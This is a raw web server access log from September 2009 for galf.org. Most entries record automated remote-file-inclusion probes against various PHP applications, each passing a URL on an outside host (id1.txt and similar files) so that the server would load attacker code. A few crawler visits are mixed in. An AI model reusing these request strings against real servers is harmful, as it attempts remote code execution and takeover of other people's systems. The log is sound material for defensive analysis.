66.246.252.166 - - [07/Sep/2009:02:35:08 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.246.252.166 - - [07/Sep/2009:02:35:08 -0700] "GET /newspublish/include.php?path%5Bdocroot%5D=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:02:35:08 -0700] "GET /logs/access_090406.log%20%20/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.6.22.91 - - [07/Sep/2009:02:36:21 -0700] "GET /logs/access_080922.log HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
65.55.106.186 - - [07/Sep/2009:02:36:41 -0700] "GET /robots.txt HTTP/1.1" 404 275 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
66.246.252.166 - - [07/Sep/2009:02:37:46 -0700] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.246.252.166 - - [07/Sep/2009:02:37:46 -0700] "GET /logs/access_090223.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
66.246.252.166 - - [07/Sep/2009:02:37:46 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:02:38:02 -0700] "GET /logs/access_090406.log%20%20/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:02:38:05 -0700] "GET /errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:02:38:05 -0700] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:02:38:05 -0700] "GET /logs/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.246.252.166 - - [07/Sep/2009:02:38:08 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
80.67.26.40 - - [07/Sep/2009:02:38:08 -0700] "GET /logs/access_090406.log%20%20/errors.php?error=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
65.55.106.186 - - [07/Sep/2009:02:39:06 -0700] "GET /?D=D HTTP/1.0" 200 1032 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:02:39:09 -0700] "GET /ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:02:39:37 -0700] "GET /logs/access_090622.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:02:39:37 -0700] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
218.38.136.251 - - [07/Sep/2009:02:40:34 -0700] "GET /logs/access_090629.log%20%20//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.246.252.166 - - [07/Sep/2009:02:40:49 -0700] "GET /logs/access_090223.log%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://muksang.net/bbs/icon/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.831" "www.galf.org"
24.7.126.177 - - [07/Sep/2009:02:42:54 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "LinguaBot/v0.001-dev (MultiLinual Sarch Engine v0.001; LinguaSeek; admin at linguaseek dot com)" "www.galf.org"
24.7.126.177 - - [07/Sep/2009:02:42:55 -0700] "GET / HTTP/1.0" 200 1032 "-" "LinguaBot/v0.001-dev (MultiLinual Sarch Engine v0.001; LinguaSeek; admin at linguaseek dot com)" "www.galf.org"
125.141.196.8 - - [07/Sep/2009:02:45:03 -0700] "GET /logs/access.log%20%20///?_zb_path=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
125.141.196.8 - - [07/Sep/2009:02:45:03 -0700] "GET //?_zb_path=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "galf.org"
125.141.196.8 - - [07/Sep/2009:02:45:03 -0700] "GET /logs///?_zb_path=http://www.archivverein-herrnhut.de/cms/zfxid.txt? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "galf.org"
61.63.4.74 - - [07/Sep/2009:02:45:50 -0700] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.63.4.74 - - [07/Sep/2009:02:45:50 -0700] "GET /logs/access_090330.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.63.4.74 - - [07/Sep/2009:02:45:50 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.202.66 - - [07/Sep/2009:02:46:56 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
211.43.202.66 - - [07/Sep/2009:02:46:56 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "galf.org"
61.63.4.74 - - [07/Sep/2009:02:48:51 -0700] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
61.63.4.74 - - [07/Sep/2009:02:48:52 -0700] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
211.43.202.66 - - [07/Sep/2009:02:50:27 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "galf.org"
211.43.202.66 - - [07/Sep/2009:02:50:27 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "galf.org"
79.174.78.83 - - [07/Sep/2009:02:51:18 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [07/Sep/2009:02:51:24 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [07/Sep/2009:02:51:24 -0700] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
195.190.166.35 - - [07/Sep/2009:02:52:35 -0700] "GET /logs/access_090202.log/errors.php?error=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.190.166.35 - - [07/Sep/2009:02:52:35 -0700] "GET /logs/errors.php?error=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
195.190.166.35 - - [07/Sep/2009:02:52:35 -0700] "GET /errors.php?error=http://tvse.nl/images/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
66.90.115.6 - - [07/Sep/2009:02:53:14 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://gn.fileave.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
66.90.115.6 - - [07/Sep/2009:02:53:14 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://gn.fileave.com/id1.txt? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
66.90.115.6 - - [07/Sep/2009:02:53:14 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://gn.fileave.com/id1.txt? HTTP/1.1" 200 4805 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [07/Sep/2009:02:53:14 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [07/Sep/2009:02:53:15 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [07/Sep/2009:02:53:18 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [07/Sep/2009:02:53:18 -0700] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [07/Sep/2009:02:53:18 -0700] "GET /logs/access.log//bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
79.174.78.83 - - [07/Sep/2009:02:53:18 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.63.4.74 - - [07/Sep/2009:02:58:22 -0700] "GET /logs/access_090330.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.63.4.74 - - [07/Sep/2009:02:58:59 -0700] "GET /logs/access_090706.log%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
211.43.202.66 - - [07/Sep/2009:02:59:56 -0700] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "galf.org"
211.43.202.66 - - [07/Sep/2009:02:59:56 -0700] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://messinia.onegreece.com/tmp/id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "galf.org"
65.55.165.12 - - [07/Sep/2009:03:03:59 -0700] "GET /cendoc/?D=A HTTP/1.0" 200 510 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SLCC1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.2)" "www.galf.org"
62.141.56.136 - - [07/Sep/2009:03:09:11 -0700] "GET /logs/access.log/?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.136 - - [07/Sep/2009:03:09:12 -0700] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 1048 "-" "libwww-perl/5.65" "www.galf.org"
62.141.56.136 - - [07/Sep/2009:03:09:12 -0700] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.wdiet.co.kr/img/file/dot.gif?? HTTP/1.1" 200 4799 "-" "libwww-perl/5.65" "www.galf.org"
82.146.119.209 - - [07/Sep/2009:03:10:37 -0700] "GET /logs/access.log//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
82.146.119.209 - - [07/Sep/2009:03:10:37 -0700] "GET /tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
82.146.119.209 - - [07/Sep/2009:03:10:37 -0700] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://daloisio.org/nqowg/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "galf.org"
94.136.37.141 - - [07/Sep/2009:03:13:06 -0700] "GET /logs/access_090406.log/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:13:06 -0700] "GET /logs/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:13:06 -0700] "GET /administrator/http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:13:10 -0700] "GET /logs/access_090713.log/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/mildfx.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:13:21 -0700] "GET /administrator/http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:13:21 -0700] "GET /logs/administrator/http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:13:21 -0700] "GET /logs/access_090406.log/administrator/http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:13:25 -0700] "GET /administrator/http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:13:25 -0700] "GET /logs/access_090406.log/administrator/http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:13:25 -0700] "GET /logs/administrator/http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:13:27 -0700] "GET /logs/access_090713.log/administrator/http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:13:32 -0700] "GET /logs/access_090713.log/administrator/http://ta-photo.com/templates/Varages/mild.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:16:58 -0700] "GET /logs/access_090713.log/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:16:58 -0700] "GET /administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:16:58 -0700] "GET /logs/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:17:13 -0700] "GET /logs/access_090406.log/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:17:28 -0700] "GET /logs/access_090406.log/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:17:28 -0700] "GET /administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:17:31 -0700] "GET /logs/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:17:31 -0700] "GET /logs/access_090713.log/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:18:39 -0700] "GET /logs/access_090413.log/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.galf.org"
206.225.23.4 - - [07/Sep/2009:03:18:49 -0700] "GET /mcf.php?content=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [07/Sep/2009:03:18:49 -0700] "GET /logs//mcf.php?content=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
206.225.23.4 - - [07/Sep/2009:03:18:49 -0700] "GET /logs/access_090406.log%20%20//mcf.php?content=http://museum-mputantular.com/css/id1?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:19:06 -0700] "GET /logs/access_090413.log/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
94.136.37.141 - - [07/Sep/2009:03:21:26 -0700] "GET /logs/access.log/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
94.136.37.141 - - [07/Sep/2009:03:21:26 -0700] "GET /administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
94.136.37.141 - - [07/Sep/2009:03:21:26 -0700] "GET /logs/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "galf.org"
94.136.37.141 - - [07/Sep/2009:03:22:13 -0700] "GET /logs/access.log/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
94.136.37.141 - - [07/Sep/2009:03:22:13 -0700] "GET /administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
94.136.37.141 - - [07/Sep/2009:03:22:13 -0700] "GET /logs/administrator/http://www.standrewkimchicago.org/bbs/data/daegun/sx1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "galf.org"
74.50.85.104 - - [07/Sep/2009:03:25:39 -0700] "GET ///vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:25:39 -0700] "GET /logs////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:25:40 -0700] "GET /logs/access.log%20%20////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:25:43 -0700] "GET ///vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:25:43 -0700] "GET /logs////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:25:43 -0700] "GET /logs/access.log%20%20////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:26:35 -0700] "GET /logs/access.log////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:26:35 -0700] "GET ///vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:26:35 -0700] "GET /logs////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:26:35 -0700] "GET ///vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:26:35 -0700] "GET /logs////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:26:35 -0700] "GET /logs/access.log////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:30:30 -0700] "GET /logs/access_090309.log%20%20////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:30:30 -0700] "GET /logs////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:30:30 -0700] "GET ///vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:30:46 -0700] "GET ///vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:30:46 -0700] "GET /logs/access_090309.log%20%20////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:30:46 -0700] "GET /logs////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
74.50.85.104 - - [07/Sep/2009:03:31:17 -0700] "GET /logs/access_090713.log%20%20////vwar/backup/errors.php?error=http://www.festivalamazonasjazz.com.br/admin/fotos/fotos/grandes/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.63.4.74 - - [07/Sep/2009:03:40:18 -0700] "GET ///vwar/backup/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.63.4.74 - - [07/Sep/2009:03:40:19 -0700] "GET /logs////vwar/backup/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.63.4.74 - - [07/Sep/2009:03:40:19 -0700] "GET /logs/access.log%20%20////vwar/backup/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.63.4.74 - - [07/Sep/2009:03:40:28 -0700] "GET ///vwar/backup/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
61.63.4.74 - - [07/Sep/2009:03:40:28 -0700] "GET /logs/access.log%20%20////vwar/backup/errors.php?error=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.galf.org"
